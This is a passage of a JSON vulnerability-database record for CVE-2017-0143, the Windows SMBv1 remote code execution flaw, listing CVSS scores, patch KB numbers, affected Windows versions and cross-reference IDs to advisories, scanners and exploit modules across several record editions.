"AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T08:55:45", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T08:55:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012217", "KB4012212", "KB4012214", "KB4012216", "KB3212646", "KBMS16-110, 3187754", "KB4013198", "KB3210720", "KB4012215", "KB3213986", "KB4013429", "KB3205409", "KB4012606", "KB4012598", "KB3177186", "KB3205401", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:55:45", "differentElements": ["msAffectedSoftware"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T14:46:24", "history": [], "viewCount": 9, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", 
"KLA10979", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T14:46:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T14:46:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012215", "KB4012217", "KB4012606", "KB4012216", "KB4013429", "KBMS16-110, 3187754", "KB4012214", "KB4012213", "KB3210721", "KB3205401", "KB4012598", "KB3210720", "KB3213986", "KB3205409", "KB3212646", "KB4013198", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 
"Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": 
"KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": 
""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:46:24", "differentElements": ["msAffectedSoftware"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T16:51:19", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
